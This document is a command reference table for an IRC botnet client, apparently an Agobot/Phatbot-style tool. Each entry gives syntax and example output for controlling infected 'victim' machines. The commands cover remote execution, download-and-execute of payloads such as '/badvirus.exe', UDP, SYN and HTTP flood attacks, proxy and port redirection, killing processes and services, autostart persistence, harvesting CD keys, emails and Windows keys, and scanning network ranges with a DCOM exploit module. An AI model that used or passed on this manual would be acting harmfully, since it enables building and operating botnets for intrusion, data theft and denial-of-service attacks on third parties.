|
COMMAND |
SYNTAX |
DESCRIPTION |
EXAMPLE |
|
:command
manager commands |
|
|
|
|
commands.list
|
commands.list |
Lists all available commands |
<User> .commands.list
<BoT> -[ command list ]-
<BoT> 1. / "commands.list" / "Lists all available commands"
<BoT> 2. / "cvar.list" / "prints a list of all cvars"
(and more to folllow...) |
|
:cvar
commands |
|
|
top |
|
cvar.list |
cvar.list |
prints a list of all cvars |
<User> .cvar.list
<BoT> -[ cvar list ]-
<BoT> 1. / "bot_ftrans_port" / "5252" / "Bot - File
Transfer Port"
<BoT> 2. / "bot_ftrans_port_ftp" / "16225" / "Bot - File Transfer Port for
FTP"
(and more to folllow...)
|
|
cvar.get |
cvar.get <cvarname> |
gets the content of a cvar |
<User> .cvar.get si_mainchan
<BoT> si_mainchan == "#BoT" |
|
cvar.set |
cvar.set <cvarname>
"<value>" |
sets the content of a cvar |
<User> .cvar.set bot_prefix
"\"
<BoT> bot_prefix = "\" (was ".")
<User> \bot.status
<BoT> BoT (0.1.3 Alpha) "Release" on "Win32" ready. Up 0d
0h 0m.
|
|
cvar.loadconfig |
cvar.loadconfig <path>
<filename> |
loads config from a file |
<User> .cvar.loadconfig
%temp%\1.dat
<BoT> Successfully loaded config... |
|
cvar.saveconfig
|
cvar.saveconfig <path>
<filename> |
saves config to a file |
<User>
.cvar.saveconfig %temp%\1.dat
<BoT> Successfully saved config... |
|
:mac
commands |
|
|
top |
|
login |
login <user> <pass> |
logs the user in |
<User> .login Wonk
bunghole
<D-oafxbgr> Password accepted. |
|
mac.logout
|
mac.logout |
logs the user out |
<User> .mac.logout
<BoT> User User logged out. |
|
:bot
commands |
|
|
top |
|
bot.about |
bot.about |
displays the info the author
wants you to see |
<User> .bot.about
<BoT> Norton Sux (Norton Sux) "Release" on "Win32" |
|
bot.dns |
bot.dns <hostname/ip> |
resolves ip/hostname by dns |
<User> .bot.dns
User.bastart.net
<BoT> User.bastart.net -> 90.0.1.55
<User> .bot.dns 90.0.1.55
<BoT> 90.0.1.55 -> User.bastart.net |
|
bot.execute |
bot.execute <visibility>
"<command>" |
makes the bot execute an
.exe, exe is hidden when visibility is 0. note that
visibility has no effect on gui programs that dont honor
the visibility parameter WinMain gets. |
<User> .bot.execute 1
notepad.exe
(Victim executes notepad.exe visible) |
|
bot.id |
bot.id |
displays the bots id which
is used to identify which version is running, and only
update the bots that need it during an update |
<User> .bot.id
<BoT> DC0M0R17 |
|
bot.nick |
bot.nick <nickname> |
changes the nickname of the
bot |
<User> .bot.nick dem_bot0r
--- BoT is now known as dem_bot0r |
|
bot.open |
bot.open <filename> |
makes the bot open any file
using ShellExecuteA or similar functions (in Linux) to
open any file that is a registered file type
|
<User> .bot.open e:\BoT.txt
(Victim opens e:\BoT.txt in Notepad) |
|
bot.remove |
bot.remove |
completely removes the bot
from the system |
<User> .bot.remove
<BoT> removing bot...
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
|
bot.removeallbut |
bot.removeallbut <id> |
same as bot.remove, but
skips bots that have the specified id |
<User> .bot.removeallbut
DC0M0R17
(All bots that don't have id DC0M0R17 remove themselves) |
|
bot.rndnick |
bot.rndnick |
assigns a new random
nickname to the bot |
<User> .bot.rndnick
--- User-odkaz is now known as User-buzjb
<User> .bot.rndnick
--- User-buzjb is now known as User-dgrpv
|
|
bot.status |
bot.status |
causes the bot to display
its status |
<User> .bot.status
<BoT> Norton Sux (Norton Sux) "Release" on "Win32" ready. Up 0d 16h 6m. |
|
bot.sysinfo |
bot.sysinfo |
causes the bot to display
system information |
<User> .bot.sysinfo
<BoT> cpu: 1050MHz ram: 13MB/127MB os: 2000 [Service Pack
1] up: 0d 16h 8m box: ANYINSTR-IZOFX0 freespace: C:15001MB
|
|
bot.longuptime |
bot.longuptime |
If uptime > 7 days then bot
will respond |
<User> .bot.longuptime
<D-gdkbmyo> uptime: 9d 17h 30m |
|
bot.highspeed |
bot.highspeed |
If speed > 5000 then bot
will respond |
<User> .bot.highspeed
<D-ymchmc> Speed: 22953 kbit/s |
|
bot.quit |
bot.quit |
quits the bot" |
<User> .bot.quit
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
|
bot.flushdns |
bot.flushdns |
flushes the bots dns cache |
<User> .bot.flushdns |
|
bot.secure |
bot.secure |
Makes the bot secure by
deleting shares and disabling dcom |
<User> .bot.secure
<BoT> Bot Secured |
|
bot.unsecure |
bot.unsecure |
Makes the unsecure by
creating shares and enabling dcom |
<User> .bot.unsecure
<BoT> Bot UnSecured |
|
bot.command
|
bot.command <command> |
runs a command with system() |
|
|
:irc
commands |
|
|
top |
|
irc.disconnect /
irc.reconnect |
irc.disconnect /
irc.reconnect |
disconnects/reconnects the
bot from irc |
<User> .irc.disconnect
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
|
irc.action |
irc.action <target>
"<action>" |
lets the bot perform an
action |
<User> .irc.action #BoT
"ddoses da bad guy"
* BoT ddoses da bad guy |
|
irc.getedu |
irc.getedu |
prints netinfo when the bot
is .edu |
<User> .irc.getedu
<BoT> connection type: N/A (N/A). local IP address:
18.240.0.110. connected from: XXXXXXXX.mit.edu
(more to follow...) |
|
irc.gethost |
irc.gethost <hostpart>
|
prints netinfo when host
matches |
<User> .irc.gethost tu-
<BoT> connection type: N/A (N/A). local IP address:
130.83.217.200. connected from:
cXXXX.karlshof.wh.tu-darmstadt.de
(more to follow...) |
|
irc.join/irc.part |
irc.join <channel> <pwd> /
irc.part <channel> |
makes the bot join part the
specified channel |
<User> .irc.join #Userbot4
AJuq4Js
(Victim joins #Userbot4)
<User> .irc.part #Userbot4
(Victim leaves #Userbot4) |
|
irc.mode |
irc.mode <modestr> |
makes the the bot change irc
modes |
<User> .irc.mode
#wonk3d +o User
* D-dpgcyrb sets mode:
+o User |
|
irc.netinfo |
irc.netinfo |
causes the bot to display
network information |
<User> .irc.netinfo
<BoT> connection type: N/A (N/A). local IP address: 66.236.189.19.
connected from: 66.236.189.19. private ip: no. speed:
EU(390 kbit/s) US(279 kbit/s) ASIA(0 kbit/s) Total(223
kbit/s) |
|
irc.privmsg |
irc.privmsg <target>
"<text>"
|
makes the bot send a privmsg
to the target |
<User> .irc.privmsg #BoT
"bla"
<BoT> bla
<User> .irc.privmsg User "bla"
*BoT* bla |
|
irc.quit |
irc.quit |
makes the bot quit from irc
|
<User> .irc.quit
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
|
irc.raw |
irc.raw "<string>" |
makes the bot send raw
string to the server |
<User> .irc.raw "QUIT :Bla"
<-- BoT has quit (Quit: Bla) |
|
irc.server
|
irc.server <server> <port>
<serverpass> |
makes the change the server
cvars |
<User> .irc.server
some.ircd.org 6667 |
|
:http/ftp
commands |
|
|
top |
|
http.speedtest |
http.speedtest |
performs a speedtest on the
bot |
|
|
http.download |
http.download <host> <path>
<target>
|
makes the bot download a
file from http to the specified directory. supports
environment variable expansions. |
<User> .http.download
www.microsoft.com / %TEMP%\microsoft.html
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.html finished. |
|
http.execute |
http.execute <host> <path>
<target> |
makes the bot download a
file from http to the specified directory and execute it.
supports environment variable expansions. |
<User> .http.execute
www.microsoft.com /badvirus.exe %TEMP%\microsoft.exe
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.exe finished.
<BoT> opened C:\Temp\microsoft.exe. |
|
http.update |
http.update <host> <path>
<target> <id> |
makes the bot download a
file from http to the specified directory and update to it
if the id doesn't match. supports environment variable
expansions. |
<User> .http.update
www.microsoft.com /badvirus.exe %TEMP%\microsoft.exe
Microsoft0r24
<BoT> Receiving file
<BoT> download to C:\Temp\microsoft.exe finished,
updating.... |
|
ftp.download |
ftp.download <user> <pass>
<host> <path> <target>
|
makes the bot download a
file from ftp to the specified directory. supports
environment variable expansions. |
<User> .ftp.download billg
password ftp.microsoft.com / %TEMP%\microsoft.html
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.html finished. |
|
ftp.execute |
ftp.execute <user> <pass>
<host> <path> <target>
|
makes the bot download a
file from ftp to the specified directory and execute it.
supports environment variable expansions. |
<User> .ftp.execute billg
password www.microsoft.com /badvirus.exe
%TEMP%\microsoft.exe
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.exe finished.
<BoT> opened C:\Temp\microsoft.exe. |
|
ftp.update
|
ftp.update <user> <pass>
<host> <path> <target> <id>
|
makes the bot download a
file from ftp to the specified directory and update to it
if the id doesn't match. supports environment variable
expansions. |
<User> .ftp.update billg
password www.microsoft.com /badvirus.exe
%TEMP%\microsoft.exe Microsoft0r24
<BoT> Receiving update
<BoT> download to C:\Temp\microsoft.exe finished,
updating.... |
|
:ddos
commands |
|
|
top |
|
ddos.udpflood |
.ddos.udpflood <target>
<port>[0=rand] <time>(secs) <delay>(ms) |
starts a UDP flood |
|
|
.ddos.synflood |
.ddos.synflood <host> <time>
<delay> <port>
- port 0 = random port |
starts a SYN flood |
|
|
.ddos.httpflood |
.ddos.httpflood <url>
<number> <referrer> <delay> <recursive>
- delay 0 = random delay (1-24h)
- recursive = get page resources |
starts an HTTP flood |
|
|
ddos.stop |
ddos.stop |
stops all floods |
|
|
ddos.phatsyn |
.ddos.phatsyn <host> <time>
<delay> <port>
- port 0 = random port |
starts a PHATsyn flood |
|
|
ddos.phaticmp |
.ddos.phaticmp <host> <time>
<delay> |
starts a PHATicmp flood |
|
|
ddos.phatwonk
|
.ddos.phatwonk <host> <time>
<delay> |
starts leet PHATWONK flood |
|
|
:redirect
commands |
|
|
top |
|
redirect.tcp
|
redirect.tcp <localport>
<remotehost> <remoteport> |
redirects a tcp port to
another host |
<User> .redirect.tcp 2352
www.microsoft.com 80
<BoT> redirtcp: redirecting from port 2352 to
"www.microsoft.com:80". |
|
redirect.gre |
redirect.gre <server>
<client> [localip]
|
redirects gre traffic, this
can be used to proxy PPTP VPN connections.
|
<User> .redirect.gre
www.microsoft.com User.bastart.net
<BoT> redirgre: redirecting from "www.microsoft.com" to
"User.bastart.net" over "". |
|
redirect.http |
redirect.http <port> |
starts a http proxy on
specified port |
|
|
redirect.https |
redirect.https <port> |
starts a https proxy on
specified port |
|
|
redirect.socks |
redirect.socks <port> |
starts a socks4 proxy on
specified port |
|
|
redirect.stop |
redirect.stop |
stops all redirects
immediately |
<User> .redirect.stop |
|
rsl commands |
|
|
|
|
rsl.reboot |
rsl.reboot |
reboots the computer |
|
|
rsl.shutdown |
rsl.shutdown |
shuts the computer down |
|
|
rsl.logoff
|
rsl.logoff |
logs the user off |
|
|
:pctrl/inst commands |
|
|
top |
|
pctrl.list |
pctrl.list |
lists all processes |
<BoT> -[ process list ]-
<BoT> 1. / Pid: 464 / "\SystemRoot\System32\smss.exe"
<BoT> 2. / Pid: 552 /
"\??\C:\WINDOWS\system32\winlogon.exe"
<BoT> 3. / Pid: 596 / "C:\WINDOWS\system32\services.exe"
(more to follow) |
|
pctrl.kill |
pctrl.kill <service file> |
|
|
|
pctrl.listsvc |
pctrl.listsvc |
lists all services |
<User> .pctrl.listsvc
<BoT> -[ service list ]-
<BoT> 1. / [a3] ["C:\WINDOWS\System32\wudgra.exe" -service]
<BoT> 2. / [Generic System Service] [????.exe]
<BoT> 3. / [mpr] ["C:\WINDOWS\System32\explore.exe" -service]
(more to follow) |
|
pctrl.killsvc |
pctrl.killsvc <service name> |
deletes/stops service |
|
|
pctrl.killpid |
pctrl.killpid <pid> |
kills a pid |
|
|
inst.asadd |
inst.asadd |
adds an autostart entry |
|
|
inst.asdel |
inst.asdel |
deletes an autostart entry |
|
|
inst.svcadd |
inst.svcadd |
adds a service to scm |
|
|
inst.svcdel
|
inst.svcdel |
deletes a service from scm |
|
|
:harvest
commands |
|
|
top |
|
harvest.cdkeys |
harvest.cdkeys |
makes the bot get a list of
cdkeys |
|
|
harvest.emails |
harvest.emails |
makes the bot get a list of
emails |
|
|
harvest.emailshttp |
harvest.emailshttp |
makes the bot get a list of
emails via http |
|
|
harvest.aol |
harvest.aol |
makes the bot get aol stuff |
|
|
harvest.registry |
harvest.registry |
makes the bot get registry
info from exact registry path |
|
|
harvest.windowskeys
|
harvest.windowskeys |
makes the bot get windows
registry info |
|
|
:logic/plugin commands |
|
|
top |
|
logic.ifuptime |
logic.ifuptime <number>
<command> |
exec command if uptime is
bigger than specified |
|
|
logic.ifspeed |
logic.ifspeed <number>
<command> |
exec command if speed(via
speedtest) is bigger than specified |
|
|
plugin.load |
plugin.load |
loads a plugin |
(not supported yet) |
|
plugin.unload
|
plugin.unload |
unloads a plugin
|
(not supported yet) |
|
:scan
commands |
|
|
top |
|
scan.addnetrange |
scan.addnetrange <ip range>
<priority> |
adds a netrange to the
scanner |
|
|
scan.delnetrange |
scan.delnetrange <ip range> |
deletes a netrange from the
scanner |
|
|
scan.listnetranges |
scan.listnetranges |
lists all netranges
registered with the scanner |
<User> .scan.listnetranges
[BoT] -[ netrange list ]-
[BoT] 1. mask: 128.113.146.0/24 prio: 80
[BoT] 2. mask: 128.113.0.0/16 prio: 90 |
|
scan.clearnetranges |
scan.clearnetranges |
clears all netranges
registered with the scanner |
|
|
scan.resetnetranges |
scan.resetnetranges |
resets netranges to the
localhost |
|
|
scan.enable |
scan.enable <module name> |
enables a scanner module |
<User> .scan.enable DCOM |
|
scan.disable |
scan.disable <module name> |
disables a scanner module |
|
|
scan.startall |
scan.startall |
enable all Scanners and
start scanning |
|
|
scan.stopall |
scan.stopall |
disable all Scanners and
stop scanning |
|
|
scan.start |
scan.start |
signal start to child
threads |
|
|
scan.stop |
scan.stop |
signal stop to child threads |
|
|
|
